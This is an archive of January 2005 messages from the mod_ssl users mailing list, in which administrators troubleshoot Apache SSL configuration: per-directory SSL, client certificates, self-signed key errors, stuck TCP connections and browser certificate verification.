I am trying to configure apache 1.3.33 with modssl2.8.22-1.3.33 on a virual
host but only for a specific directory. I have SSL working for the doc root
for various virtual hosts. I have read through the mod_ssl docs, and
O'Reilly's Apache guide, but I haven't been able to get it to work.

Specifically, for the servername sam, when a browser hits the DocumentRoot,
I want to ensure that SSL is not invoked (just for performance reasons) but
when a user hits /admin, then SSL must be invoked. I have tried various
tweaks to no avail (the virtual host section is below). I know that I am
using the correct httpd.conf file because when I fat finger a directive, and
stop and start apache, I get an error. Changes to SSLEngine off|on seem to
have no effect.

Any ideas, thanks.


NameVirtualHost 192.168.10.50:80



# Disable SSL first
SSLEngine off


        SSLEngine off
        ServerAdmin root@localhost
        DocumentRoot /www/htdocs
        ServerName storage
        ErrorLog logs/error_log
        CustomLog logs/access_log combined



        SSLEngine off
        ServerAdmin root@localhost
        DocumentRoot /www/sam
        ServerName sam
        ErrorLog logs/sam_error_log
        CustomLog logs/sam_access_log combined



        SSLEngine on
        ServerName sam
        DocumentRoot /www/sam
        SSLCertificateFile /www/conf/ssl.crt/sam.cert
        SSLCertificateKeyFile /www/conf/ssl.key/sam.key
        SSLVerifyClient 0
        ErrorLog logs/sam_error_log
        CustomLog logs/sam_access_log combined

        
                SSLRequireSSL
                SSLOptions +StrictRequire
#               AuthType basic
#               AuthName admin
#               AuthUserFile /www/auth/admin-users
#               AuthGroupFile /www/auth/groups
#               require valid-user
        



        SSLDisable
        ServerAdmin root@localhost
        DocumentRoot /www/mike
        ServerName mike
        ErrorLog logs/mike_error_log
        CustomLog logs/mike_access_log combined


______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org


______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Jan  4 00:08:50 2005
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id C46D9A8AD1; Tue,  4 Jan 2005 00:08:50 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from mail03.eznettools.net (mail.eznettools.net [12.42.147.40])
	by master.modssl.org (Postfix) with ESMTP id 98B1BA8961
	for ; Tue,  4 Jan 2005 00:08:36 +0100 (CET)
Received: from testing (shadow.icserv.net [12.42.147.37] (may be forged))
	by mail03.eznettools.net (8.13.1/8.12.5) with SMTP id j040qbVW010817
	for ; Mon, 3 Jan 2005 17:52:42 -0700
Message-ID: <03ea01c4f24e$13b7a5b0$2500a8c0@eckmandomain.corporate.icserv.net>
From: "P Larkin Waters" 
To: 
References: 
Subject: Re: Client Certificates (Help!)
Date: Tue, 4 Jan 2005 04:10:57 -0700
MIME-Version: 1.0
Content-Type: text/plain;
	charset="iso-8859-1"
Content-Transfer-Encoding: 7bit
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 6.00.2800.1158
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2800.1165
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "P Larkin Waters" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

did you use a real certificate?
if you used a test certificate did you install the test certificate
authority?
I'm sure you know that test certificates don't work with the CA's that
come preinstalled in most browsers.

____
Theory is when you know something, but it doesn't work.
Practice is when something works, but you don't know why.
Programmers combine theory and practice:
Nothing works and they don't know why.
--Unknown
----- Original Message ----- 
From: "David T. Ashley" 
To: 
Sent: Tuesday, December 21, 2004 7:29 PM
Subject: Client Certificates (Help!)


> Hi,
>
> Does anyone have any good URLs or instructions about how to create
client
> certificates for browsers so that only browsers with the certificate
can
> connect to the server (or view certain directories on the server)?
>
> I tried one procedure I found on the web, and it ended up with Apache
> complaining about the keys and certificates it had.  The best I could
do
> myself was a self-signed SSL certificate (which worked fine), but the
client
> certificates didn't work out.
>
> I'll try any procedures anyone supplies, and if that doesn't work I'll
post
> detailed information about what I tried and what went wrong.
>
> The site, by the way, is www.e-collab.com.  The self-signed SSL
certificate
> for Apache worked fine.  It was just the more advanced stuff that
eluded me.
>
> Thanks a lot!
>
> Merry Christmas!
>
> Dave Ashley.
>
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org
>

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Jan  4 00:59:14 2005
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 8A68FA8940; Tue,  4 Jan 2005 00:59:14 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from adrastea.tiggee.com (ns5.dnsmadeeasy.com [63.219.151.12])
	by master.modssl.org (Postfix) with ESMTP id C6BA3A8933
	for ; Tue,  4 Jan 2005 00:59:01 +0100 (CET)
Received: from DTALAPTOP02 (ACA4A9D0.ipt.aol.com [172.164.169.208]) (authenticated as dashley with LOGIN if spam please forward this message with this full header to abuse@dnsmadeeasy.com for ; Mon, 3 Jan 2005 18:58:42 -0500
From: "David T. Ashley" 
To: 
Subject: RE: Client Certificates (Help!)
Date: Mon, 3 Jan 2005 19:02:33 -0500
Message-ID: 
MIME-Version: 1.0
Content-Type: text/plain;
	charset="iso-8859-1"
Content-Transfer-Encoding: 7bit
X-Priority: 3 (Normal)
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook IMO, Build 9.0.2416 (9.0.2911.0)
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2800.1409
Importance: Normal
In-Reply-To: <03ea01c4f24e$13b7a5b0$2500a8c0@eckmandomain.corporate.icserv.net>
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "David T. Ashley" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Hi Mr. Waters,

I got it all straightened out.  I had just not converted to the right
key/certificate format, etc.

Did, however, run into a bug where Apache won't support POST with client
authentication.  I've been advised to downgrade Apache.

Dave.

> -----Original Message-----
> From: owner-modssl-users@modssl.org
> [mailto:owner-modssl-users@modssl.org]On Behalf Of P Larkin Waters
> Sent: Tuesday, January 04, 2005 6:11 AM
> To: modssl-users@modssl.org
> Subject: Re: Client Certificates (Help!)
>
>
> did you use a real certificate?
> if you used a test certificate did you install the test certificate
> authority?
> I'm sure you know that test certificates don't work with the CA's that
> come preinstalled in most browsers.
>
> ____
> Theory is when you know something, but it doesn't work.
> Practice is when something works, but you don't know why.
> Programmers combine theory and practice:
> Nothing works and they don't know why.
> --Unknown
> ----- Original Message -----
> From: "David T. Ashley" 
> To: 
> Sent: Tuesday, December 21, 2004 7:29 PM
> Subject: Client Certificates (Help!)
>
>
> > Hi,
> >
> > Does anyone have any good URLs or instructions about how to create
> client
> > certificates for browsers so that only browsers with the certificate
> can
> > connect to the server (or view certain directories on the server)?
> >
> > I tried one procedure I found on the web, and it ended up with Apache
> > complaining about the keys and certificates it had.  The best I could
> do
> > myself was a self-signed SSL certificate (which worked fine), but the
> client
> > certificates didn't work out.
> >
> > I'll try any procedures anyone supplies, and if that doesn't work I'll
> post
> > detailed information about what I tried and what went wrong.
> >
> > The site, by the way, is www.e-collab.com.  The self-signed SSL
> certificate
> > for Apache worked fine.  It was just the more advanced stuff that
> eluded me.
> >
> > Thanks a lot!
> >
> > Merry Christmas!
> >
> > Dave Ashley.
> >
> > ______________________________________________________________________
> > Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> > User Support Mailing List                      modssl-users@modssl.org
> > Automated List Manager                            majordomo@modssl.org
> >
>
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org
>
>

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Jan  4 01:37:18 2005
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 59DFEA8A89; Tue,  4 Jan 2005 01:37:18 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from sccrmhc11.comcast.net (sccrmhc11.comcast.net [204.127.202.55])
	by master.modssl.org (Postfix) with ESMTP id AFCA4A89B0
	for ; Tue,  4 Jan 2005 01:37:13 +0100 (CET)
Received: from [10.0.1.2] (c-24-18-159-191.client.comcast.net[24.18.159.191])
          by comcast.net (sccrmhc11) with SMTP
          id <2005010400365901100gis64e>; Tue, 4 Jan 2005 00:36:59 +0000
Mime-Version: 1.0 (Apple Message framework v619)
Content-Transfer-Encoding: 7bit
Message-Id: 
Content-Type: text/plain; charset=US-ASCII; format=flowed
To: modssl-users@modssl.org
From: Daniel Lahey 
Subject: Enabling SSL
Date: Mon, 3 Jan 2005 16:36:58 -0800
X-Mailer: Apple Mail (2.619)
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Daniel Lahey 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

How can I use a .htaccess file to enable ssl connections on a dedicated 
server?  When I try to connect to a page on the site, I get a 404 Not 
Found error.  The configuration from the server is:

Apache/1.3.33 (Unix) mod_auth_passthrough/1.8 mod_log_bytes/1.2 
mod_bwlimited/1.4 PHP/4.3.9 FrontPage/5.0.2.2635 mod_ssl/2.8.22 
OpenSSL/0.9.7a PHP-CGI/0.1b (from phpinfo()).

It seems like I should be able to connect using an https prefix, and 
that I should be able to use a .htaccess file to accomplish this, but 
I'm having trouble finding exactly how to do this.  Can anyone point me 
to an example?

TIA

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Jan  4 17:19:39 2005
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 5F5ADA8A89; Tue,  4 Jan 2005 17:19:39 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from mx1.redhat.com (mx1.redhat.com [66.187.233.31])
	by master.modssl.org (Postfix) with ESMTP id C7805A89B0
	for ; Tue,  4 Jan 2005 17:19:32 +0100 (CET)
Received: from int-mx1.corp.redhat.com (int-mx1.corp.redhat.com [172.16.52.254])
	by mx1.redhat.com (8.12.11/8.12.11) with ESMTP id j04GJCpW009902
	for ; Tue, 4 Jan 2005 11:19:12 -0500
Received: from radish.cambridge.redhat.com (radish.cambridge.redhat.com [172.16.18.90])
	by int-mx1.corp.redhat.com (8.11.6/8.11.6) with ESMTP id j04GJAr09460
	for ; Tue, 4 Jan 2005 11:19:11 -0500
Received: from radish.cambridge.redhat.com (localhost.localdomain [127.0.0.1])
	by radish.cambridge.redhat.com (8.13.1/8.12.7) with ESMTP id j04GJ9KN006470
	for ; Tue, 4 Jan 2005 16:19:09 GMT
Received: (from jorton@localhost)
	by radish.cambridge.redhat.com (8.13.1/8.12.10/Submit) id j04GJ90s006469
	for modssl-users@modssl.org; Tue, 4 Jan 2005 16:19:09 GMT
Date: Tue, 4 Jan 2005 16:19:09 +0000
From: Joe Orton 
To: modssl-users@modssl.org
Subject: Re: Client Authentication POST Problem
Message-ID: <20050104161909.GA5494@redhat.com>
Mail-Followup-To: modssl-users@modssl.org
References:  <1104029251.5493.2.camel@localhost>  <1104031055.5493.10.camel@localhost> 
Mime-Version: 1.0
Content-Type: text/plain; charset=utf-8
Content-Disposition: inline
In-Reply-To: 
User-Agent: Mutt/1.4.1i
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Joe Orton 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

On Sat, Dec 25, 2004 at 10:52:27PM -0500, Cliff Woolley wrote:
> On Sat, 25 Dec 2004, Adolfo Bello wrote:
> 
> > I heartily agree.
> > Unfortunately, I've been waiting for more than a year for this problem
> > to be fixed in Apache 2.0.x :-(
> > This bug was opened on 2002-09-06
> > http://nagoya.apache.org/bugzilla/show_bug.cgi?id=12355
> 
> Usually the trick to getting something really done around here is to keep
> reminding somebody until it really gets their attention.  :)  Anyway I'll
> forward this on to dev@httpd, and maybe we'll get a taker.

It's a particularly annoying problem.  The solution in mod_ssl-for-1.3
is not really ideal (it allows a DoS attack of sorts); I spent some time
working on a better solution for 2.0 but it didn't seem feasible in the
end.  It remains on my list of "hard problems to fix" as time permits...

joe
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Jan  5 15:50:06 2005
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 2B514A8A4F; Wed,  5 Jan 2005 15:50:06 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from wilma.firstclassloans.co.uk (213-152-32-237.dsl.eclipse.net.uk [213.152.32.237])
	by master.modssl.org (Postfix) with ESMTP id 8288BA897D
	for ; Wed,  5 Jan 2005 15:50:01 +0100 (CET)
Received: from localhost (localhost.localdomain [127.0.0.1])
	by wilma.firstclassloans.co.uk (Postfix) with ESMTP id 0F0A7372485
	for ; Wed,  5 Jan 2005 14:49:49 +0000 (GMT)
Received: from wilma.firstclassloans.co.uk ([127.0.0.1])
 by localhost (wilma.firstclassloans.co.uk [127.0.0.1]) (amavisd-new, port 10024)
 with ESMTP id 06412-02 for ;
 Wed,  5 Jan 2005 14:49:42 +0000 (GMT)
Received: from [192.168.0.90] (unknown [192.168.0.111])
	(using TLSv1 with cipher DHE-RSA-AES256-SHA (256/256 bits))
	(No client certificate requested)
	by wilma.firstclassloans.co.uk (Postfix) with ESMTP id 76BD437247D
	for ; Wed,  5 Jan 2005 14:49:42 +0000 (GMT)
Message-ID: <41DBFE84.7040504@yahoo.co.uk>
Date: Wed, 05 Jan 2005 14:49:40 +0000
From: Bob Pilly 
User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.3) Gecko/20041020
X-Accept-Language: en, en-us
MIME-Version: 1.0
To: modssl-users@modssl.org
Subject: cant start apache with self signed cert 
Content-Type: text/plain; charset=us-ascii; format=flowed
Content-Transfer-Encoding: 7bit
X-Virus-Scanned: by amavisd-new at firstclassloans.co.uk
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Bob Pilly 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Hi All

I have Fedora 3 installed kernel 2.6.9-1.724_FC3 as well as 
httpd-2.0.52-3.1, mod_ssl-2.0.52-3.1 and openssl-0.9.7a-40. I am trying 
to generate a self signed ssl certificate for testing my machine. I 
follow the folling steps to create my own key:

to delete the dummy keys that are default with FC3

rm -f /etc/httpd.conf/ssl.crt/server.crt /etc/httpd.conf/ssl.key/server.key

then create a new key
cd /usr/share/ssl/certs/
make genkey

now to create the cert

cd /usr/share/ssl/certs/
make testcert

now when i go to start my httpd service i get this error:

service httpd start

Starting httpd: Apache/2.0.52 mod_ssl/2.0.52 (Pass Phrase Dialog)
Some of your private key files are encrypted for security reasons.
In order to read them you have to provide the pass phrases.

Server server.domain.co.uk:443 (RSA)
Enter pass phrase:Apache:mod_ssl:Error: Private key not found.
**Stopped
[FAILED]

This would suggest that the server.key file isnt in 
/etc/httpd/conf/ssl.key but i have check and it is and root has rights 
to see it.

Also /etc/httpd/conf.d/ssl.conf points to this file as well.

The out put of my ssl_errors.log is:
[Wed Jan 05 14:33:45 2005] [error] Init: Unable to read pass phrase 
[Hint: key introduced or changed before restart?]
[Wed Jan 05 14:33:45 2005] [error] SSL Library Error: 218710120 
error:0D094068:asn1 encoding routines:d2i_ASN1_SET:bad tag
[Wed Jan 05 14:33:45 2005] [error] SSL Library Error: 218529960 
error:0D0680A8:asn1 encoding routines:ASN1_CHECK_TLEN:wrong tag
[Wed Jan 05 14:33:45 2005] [error] SSL Library Error: 218595386 
error:0D07803A:asn1 encoding routines:ASN1_ITEM_EX_D2I:nested asn1 error
[Wed Jan 05 14:33:45 2005] [error] SSL Library Error: 218734605 
error:0D09A00D:asn1 encoding routines:d2i_PrivateKey:ASN1 lib

which isnt much help

I have also tried with a test certificate from freessl.com but the same 
thing happens.

Has anyone run into this before? Any help would be greatly appreciated!!
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Jan  6 19:11:17 2005
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 33109A8A7D; Thu,  6 Jan 2005 19:11:17 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from mx2.svale.netledger.com (mx2.netledger.com [63.209.28.71])
	by master.modssl.org (Postfix) with ESMTP id B7059A89E6
	for ; Thu,  6 Jan 2005 19:11:06 +0100 (CET)
Received: from corpmail.corp.netledger.com (corpmail.corp.netledger.com [172.16.31.70])
	by mx2.svale.netledger.com (8.11.6/8.11.6) with ESMTP id j06IAbK09722
	for ; Thu, 6 Jan 2005 10:10:37 -0800
Received: from [172.16.0.12] ([172.16.0.12]) by corpmail.corp.netledger.com with Microsoft SMTPSVC(5.0.2195.6713);
	 Thu, 6 Jan 2005 10:10:33 -0800
Message-ID: <41DD7F19.3080807@netsuite.com>
Date: Thu, 06 Jan 2005 11:10:33 -0700
From: Ted Rice 
User-Agent: Mozilla Thunderbird 1.0 (X11/20041206)
X-Accept-Language: en-us, en
MIME-Version: 1.0
To: modssl-users@modssl.org
Subject: Apache TCP Connections Stuck in "Reading" State
Content-Type: text/plain; charset=UTF-8; format=flowed
Content-Transfer-Encoding: 7bit
X-OriginalArrivalTime: 06 Jan 2005 18:10:33.0734 (UTC) FILETIME=[03BEB260:01C4F41B]
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Ted Rice 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Hello all,


I've been looking at an issue now for 7 days, and after
extensively reading the mailing list and docuementation, i
am unable to find a solution for my problem.

Frist, i am running Apache 1.3.28 and mod_ssl 2.8.15/openssl 0.9.7d.

The behavior i see is that during the course of normal SSL traffic
(handshakes, data transfer, closing connection) a client will sometimes
spawn between 100 and 500 TCP connections to Apache that remain
in the "Reading" state and occupy client slots until the Apache Timeout
of 1200 seconds kicks in and removes them.

For a few of the offending IP Addresses, i have used tcpdump/ssldump
to capture the TCP traffic inside of the firewall and on the Apache machine.

What i see, is as follows:


1. Normal TCP Connection
2. Followed by Handshake and Cipher Exchange
3. Application Data Flowing
4. TCP connection closed.


However, in certain cases after application data is exchanged, i will
see a flood of TCP connections that are followed by RST(s). Here is a snippet
from the TCPDUMP/SSLDUMP.


     ---------------------------------------------------------------
361 14 24.8021 (0.0000)  S>CV3.0(21)  application_data
     ---------------------------------------------------------------
     ---------------------------------------------------------------
361 15 24.9503 (0.1481)  C>SV3.0(977)  application_data
     ---------------------------------------------------------------
361    24.9521 (0.0017)  C>S  TCP RST
New TCP connection #397: REMOTE_HOST(2683) <-> APACHE_HOST(443)
397    0.1080 (0.1080)  C>S  TCP RST
New TCP connection #398: REMOTE_HOST(2684) <-> APACHE_HOST(443)
398    0.1103 (0.1103)  C>S  TCP RST
New TCP connection #399: REMOTE_HOST(2685) <-> APACHE_HOST(443)
399    0.1126 (0.1126)  C>S  TCP RST
New TCP connection #400: REMOTE_HOST(2686) <-> APACHE_HOST(443)
400    0.1147 (0.1147)  C>S  TCP RST
New TCP connection #401: REMOTE_HOST(2687) <-> APACHE_HOST(443)
401    0.1170 (0.1170)  C>S  TCP RST
New TCP connection #402: REMOTE_HOST(2688) <-> APACHE_HOST(443)
402    0.1193 (0.1193)  C>S  TCP RST
New TCP connection #403: REMOTE_HOST(2689) <-> APACHE_HOST(443)
403    0.1214 (0.1214)  C>S  TCP RST
New TCP connection #404: REMOTE_HOST(2690) <-> APACHE_HOST(443)
404    0.1237 (0.1237)  C>S  TCP RST
New TCP connection #405: REMOTE_HOST(2691) <-> APACHE_HOST(443)
405    0.1259 (0.1259)  C>S  TCP RST
New TCP connection #406: REMOTE_HOST(2692) <-> APACHE_HOST(443)
406    0.1279 (0.1279)  C>S  TCP RST
New TCP connection #407: REMOTE_HOST(2693) <-> APACHE_HOST(443)
407    0.1300 (0.1300)  C>S  TCP RST
...
<>
...
New TCP connection #580: REMOTE_HOST(2883) <-> APACHE_HOST(443)
580 1  0.0673 (0.0673)  C>SV3.0(97)  Handshake
       ClientHello
         Version 3.0


Additionally, i turned on SSL Debugging at the Apache layer, and this
is the only real relevant information i obtained:

[26/Oct/2004 07:54:24 07446] [info]  Connection to child 17 established (server
VIRTUAL_HOST:443, client REMOTE_IP)
[26/Oct/2004 07:54:24 07446] [info]  Seeding PRNG with 1160 bytes of entropy
[26/Oct/2004 07:54:24 07446] [trace] OpenSSL: Handshake: start
[26/Oct/2004 07:54:24 07446] [trace] OpenSSL: Loop: before/accept initialization
[26/Oct/2004 08:14:26 07446] [debug] OpenSSL: I/O error, 11 bytes expected to read on
BIO#082BE820 [mem: 083D2128]
[26/Oct/2004 08:14:26 07446] [trace] OpenSSL: Exit: error in SSLv2/v3 read client
hello A
[26/Oct/2004 08:14:26 07446] [error] SSL handshake timed out (client REMOTE_IP, server
VIRTUAL_HOST:443)


Notice above that the point at which the SSL hanshake timed out was at the Apache
Timeout of 1200 seconds.

During this period, the request is occupying a client slot in the Reading state.

I am *not* convinced this is a pure SSL (mod_ssl) issue based upon data collection
across the past week.

I would appreciate any help/suggestions, as i am nearly out of ideas.


thanks,


Ted Rice
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Jan  7 01:40:17 2005
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id CFC7FA8A75; Fri,  7 Jan 2005 01:40:17 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from mower.iserver.net (allez-oop.net [128.121.79.16])
	by master.modssl.org (Postfix) with ESMTP id C1527A8978
	for ; Fri,  7 Jan 2005 01:40:12 +0100 (CET)
Received: from [10.20.12.65] (fw.oremut02.us.wh.verio.net [198.65.168.24])
	(authenticated bits=0)
	by mower.iserver.net (8.13.1/8.13.1) with ESMTP id j070du8H059423
	for ; Thu, 6 Jan 2005 17:39:57 -0700 (MST)
Message-ID: <41DDDA57.8070605@allez-oop.net>
Date: Thu, 06 Jan 2005 17:39:51 -0700
From: "Omar W. Hannet" 
User-Agent: Mozilla Thunderbird 1.0 (X11/20041209)
X-Accept-Language: en-us, en
MIME-Version: 1.0
To: modssl-users@modssl.org
Subject: Action directive and client cert authentication
Content-Type: text/plain; charset=ISO-8859-1; format=flowed
Content-Transfer-Encoding: 7bit
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Omar W. Hannet" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

When I use an Action directive in a directory secured by client certificate
authentication, the CGI output does not display.

My server is Apache 1.3.33 with mod_ssl-2.8.22.  My config.status looks like this:

CFLAGS="-g -DSSL_EXPERIMENTAL -DSSL_EXPERIMENTAL_PROXY_IGNORE -DSSL_EXPERIMENTAL_ENGINE_IGNORE" \
./configure \
"--with-layout=Apache" \
"--prefix=/usr/local/apache" \
"--enable-module=ssl" \
"$@"

I have a directory htdocs/secure, which contains this .htaccess file:

AddType application/test .test
Action application/test /cgi-bin/test.pl
SSLRequireSSL
SSLVerifyClient require
SSLCACertificateFile /usr/local/etc/ca.crt

My Apache configuration contains:

SSLPassPhraseDialog  builtin
SSLSessionCache         dbm:/usr/local/apache/logs/ssl_scache
SSLSessionCacheTimeout  300
SSLMutex  file:/usr/local/apache/logs/ssl_mutex
SSLRandomSeed startup builtin
SSLRandomSeed connect builtin
SSLLog      /usr/local/apache/logs/ssl_engine_log
SSLLogLevel trace
SSLEngine on
SSLCipherSuite ALL:!ADH:!EXPORT56:RC4+RSA:+HIGH:+MEDIUM:+LOW:+SSLv2:+EXP:+eNULL
SSLCertificateFile /usr/local/apache/conf/server.crt
SSLCertificateKeyFile /usr/local/apache/conf/server.key
SSLCertificateChainFile /usr/local/apache/conf/equifax.crt
SSLCACertificateFile /usr/local/apache/conf/ca.crt
SSLVerifyDepth  10

The SSLCACertificateFile (ca.crt) is a self-signed CA which I created.
I have added the CA to my browser, along with a client cert signed by
that CA.  The same CA is copied to /usr/local/etc/ca.crt, which is
referenced by the SSLCACertificateFile directive in my .htaccess file.
This CA is different from the one securing the web server itself.

Within the htdocs/secure directory are files index.html and x.test.
When I browse with HTTPS to /secure/index.html or to /cgi-bin/test.pl,
the results are displayed just as they should be.

However, when I access /secure/x.test, the CGI output does not appear
at all.  Instead, the following messages appear in ssl_engine_log:

[06/Jan/2005 17:27:23 55592] [error] SSL error on reading data (OpenSSL library error follows)
[06/Jan/2005 17:27:23 55592] [error] OpenSSL: error:0B07C065:x509 certificate routines:X509_STORE_add_cert:cert already 
in hash table
[06/Jan/2005 17:27:23 55592] [error] OpenSSL: error:1408F455:SSL routines:SSL3_GET_RECORD:decryption failed or bad 
record mac

Is this a bug in mod_ssl, or is there something I need do to differently
to get my CGI output?

Thanks
-- 
Omar W. Hannet
Allez-Oop Net
http://www.allez-oop.net/
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Jan  7 22:39:42 2005
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 68F2CA8940; Fri,  7 Jan 2005 22:39:42 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from mail.sd59.bc.ca (mail.sd59.bc.ca [142.27.154.5])
	by master.modssl.org (Postfix) with ESMTP id C64C2A8933
	for ; Fri,  7 Jan 2005 22:39:41 +0100 (CET)
Received: from [142.27.154.10] (142.27.154.10) by mail.sd59.bc.ca with
 ESMTP (Eudora Internet Mail Server X 3.2.6) for ;
 Fri, 7 Jan 2005 14:39:27 -0700
Mime-Version: 1.0 (Apple Message framework v619)
Content-Transfer-Encoding: 7bit
Message-Id: <6E931405-60F4-11D9-A518-000A95C379DC@mail.sd59.bc.ca>
Content-Type: text/plain; charset=US-ASCII; format=flowed
To: modssl-users@modssl.org
From: John Beames 
Subject: Verification problem
Date: Fri, 7 Jan 2005 14:38:12 -0700
X-Mailer: Apple Mail (2.619)
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: John Beames 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

I am running Open_SSL on a Macintosh G5 running OS X 10.3.7 (not 
Xserve) using Apache as my server. I have SSL all set up and running in 
three of four browsers. It works fun in FireFox, Safari, and Netscape. 
With Internet Explorer though, it refuses to verify the certificate. 
Here is the section from the httpd.conf file that seems to be at the 
root of the problem:

     SSLEngine on
   # SSLProtocol all -SSLv3
     SSLCipherSuite 
ALL:!ADH:!EXPORT56:RC4+RSA:+HIGH:+MEDIUM:+LOW:+SSLv2:+EXP:+eNULL
   # Path to your certificates and private key
     SSLCertificateChainFile /etc/httpd/ssl.key/SecurityServicesCA.crt
     SSLCertificateFile /etc/httpd/ssl.key/server.crt
     SSLCertificateKeyFile /etc/httpd/ssl.key/server.key


Any suggestions??

Thanks!

John

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Sat Jan  8 20:50:57 2005
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 7A64FA897D; Sat,  8 Jan 2005 20:50:57 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from tomts25-srv.bellnexxia.net (tomts25.bellnexxia.net [209.226.175.188])
	by master.modssl.org (Postfix) with ESMTP id ACD36A8940
	for ; Sat,  8 Jan 2005 20:50:52 +0100 (CET)
Received: from devine ([65.92.64.70]) by tomts25-srv.bellnexxia.net
          (InterMail vM.5.01.06.10 201-253-122-130-110-20040306) with ESMTP
